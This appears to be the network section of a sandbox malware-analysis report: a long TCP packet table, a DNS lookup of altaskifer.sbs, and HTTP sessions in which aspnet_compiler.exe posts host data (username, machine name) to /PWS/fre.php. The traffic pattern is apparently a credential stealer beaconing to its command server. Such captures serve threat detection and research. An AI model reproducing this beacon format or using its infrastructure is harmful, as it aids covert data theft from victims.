Apr 6, 2024 09:31:05.165723085 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.165818930 CEST	49847	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.289995909 CEST	80	49847	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.314891100 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.439578056 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.439732075 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.441891909 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.566745043 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.566822052 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.691210032 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.937047005 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.937230110 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:05.937576056 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:05.937628031 CEST	49848	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.061656952 CEST	80	49848	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.079605103 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.204020023 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.204171896 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.206379890 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.330943108 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.331012964 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.457076073 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.734194040 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.734266996 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.734457016 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.734457016 CEST	49849	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.858865023 CEST	80	49849	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.872936010 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.996922970 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:06.997039080 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:06.999341011 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.123207092 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.123332977 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.247222900 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.492587090 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.492676973 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.492779016 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.495273113 CEST	49850	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.620208979 CEST	80	49850	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.642184973 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.765971899 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.766056061 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.768548965 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:07.892277002 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:07.892378092 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.016169071 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.281070948 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.281232119 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.281388998 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.281449080 CEST	49851	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.405988932 CEST	80	49851	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.422049046 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.545578003 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.545708895 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.547894955 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.671220064 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:08.671363115 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:08.794739008 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.051033020 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.051101923 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.051165104 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.051207066 CEST	49852	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.174757957 CEST	80	49852	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.190874100 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.314644098 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.314734936 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.316932917 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.441365004 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.441440105 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.565128088 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.810904026 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.811003923 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.811098099 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.811135054 CEST	49853	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:09.935069084 CEST	80	49853	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:09.953478098 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.077702999 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.077786922 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.080333948 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.204615116 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.204709053 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.328926086 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.572736979 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.572854042 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.572921991 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.572963953 CEST	49855	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.697182894 CEST	80	49855	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.720809937 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.844326973 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.844449043 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.846749067 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:10.970211029 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:10.970324039 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.095063925 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.336899042 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.336993933 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.337014914 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.337050915 CEST	49856	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.460335016 CEST	80	49856	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.483630896 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.607753038 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.608000994 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.610579014 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.734386921 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:11.734463930 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:11.858485937 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.097577095 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.097765923 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.098299026 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.098355055 CEST	49857	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.221642971 CEST	80	49857	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.231170893 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.354954004 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.355035067 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.357167959 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.481870890 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.481923103 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.605817080 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.864523888 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.864640951 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.864656925 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.864702940 CEST	49858	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:12.988382101 CEST	80	49858	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:12.991122007 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.115551949 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.115694046 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.117985964 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.241977930 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.242110014 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.365911961 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.639862061 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.640064955 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.640084982 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.640130997 CEST	49859	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.763936043 CEST	80	49859	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.770855904 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.895080090 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:13.895191908 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:13.897342920 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.021444082 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.021501064 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.145649910 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.411401987 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.411427021 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.411567926 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.411611080 CEST	49860	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.536746025 CEST	80	49860	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.537524939 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.661696911 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.661834002 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.663983107 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.788712978 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:14.788913965 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:14.914786100 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.172118902 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.172272921 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.172935009 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.173007965 CEST	49861	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.296719074 CEST	80	49861	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.337382078 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.460771084 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.460927010 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.463120937 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.586508989 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.586615086 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.710072994 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.951977015 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.952080011 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:15.952174902 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:15.952241898 CEST	49862	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:16.075745106 CEST	80	49862	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:17.689002991 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:17.813306093 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:17.813440084 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:17.815577030 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:17.939639091 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:17.939762115 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.063915968 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.328830004 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.328855038 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.328905106 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.328937054 CEST	49863	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.453838110 CEST	80	49863	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.458285093 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.582995892 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.583200932 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.590588093 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.716669083 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:18.716793060 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:18.841049910 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.106915951 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.106971025 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.107047081 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.107086897 CEST	49864	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.231465101 CEST	80	49864	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.243796110 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.368340969 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.368479013 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.370644093 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.495233059 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.495301008 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.619992971 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.871881962 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.871987104 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.873269081 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:19.873431921 CEST	49865	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:19.996573925 CEST	80	49865	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.010437012 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.134488106 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.134614944 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.136719942 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.260982990 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.261132956 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.385191917 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.636603117 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.636758089 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.636954069 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.637003899 CEST	49866	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.760694027 CEST	80	49866	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.780288935 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.904778004 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:20.904891968 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:20.907030106 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.031174898 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.031291008 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.155395985 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.399348974 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.399363995 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.399440050 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.399517059 CEST	49867	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.523947001 CEST	80	49867	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.537761927 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.662792921 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.662919998 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.669303894 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.794080019 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:21.794157028 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:21.918783903 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.172482014 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.172837019 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.173028946 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.173073053 CEST	49868	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.298506021 CEST	80	49868	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.302891970 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.426888943 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.427067041 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.429105997 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.552846909 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.552946091 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.676853895 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.932873011 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.932991982 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:22.933361053 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:22.933408022 CEST	49869	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.056910038 CEST	80	49869	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.068109035 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.192596912 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.192729950 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.194950104 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.319602966 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.319766045 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.444433928 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.701543093 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.701685905 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.701724052 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.701776981 CEST	49870	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.826260090 CEST	80	49870	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.834229946 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.959744930 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:23.959852934 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:23.961991072 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.086208105 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.086267948 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.210357904 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.470716000 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.470819950 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.471493006 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.471537113 CEST	49871	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.595120907 CEST	80	49871	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.698282003 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.821892977 CEST	80	49872	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.822781086 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.825006962 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:24.948520899 CEST	80	49872	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:24.948584080 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:25.072002888 CEST	80	49872	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:25.328350067 CEST	80	49872	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:25.328521013 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:25.329231977 CEST	80	49872	172.67.148.126	192.168.2.6
Apr 6, 2024 09:31:25.329284906 CEST	49872	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:31:25.452018023 CEST	80	49872	172.67.148.126	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 6, 2024 09:29:23.864559889 CEST	55597	53	192.168.2.6	1.1.1.1
Apr 6, 2024 09:29:24.005536079 CEST	53	55597	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 6, 2024 09:29:23.864559889 CEST	192.168.2.6	1.1.1.1	0x7	Standard query (0)	altaskifer.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 6, 2024 09:29:24.005536079 CEST	1.1.1.1	192.168.2.6	0x7	No error (0)	altaskifer.sbs		172.67.148.126	A (IP address)	IN (0x0001)	false
Apr 6, 2024 09:29:24.005536079 CEST	1.1.1.1	192.168.2.6	0x7	No error (0)	altaskifer.sbs		104.21.39.208	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

altaskifer.sbs

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:24.137227058 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 188 Connection: close
Apr 6, 2024 09:29:24.261514902 CEST	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer320946ENGINEER-PCk0FDD42EE188E931437F4FBE2CQcvvj
Apr 6, 2024 09:29:24.653399944 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ird%2BWHDZUtWVyC2%2FncP0yIxShO0qw3mvApHkRlJoExlp2h6OdyGyH8Y45xjU9%2FyHKXY%2BJ6UZsiXshhKDXzn8iibK47PsSNZerky5nlG9uw44paW1wpZoKbbruqes%2BSGxwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700110e4a1667ec-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49718	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:24.839757919 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 188 Connection: close
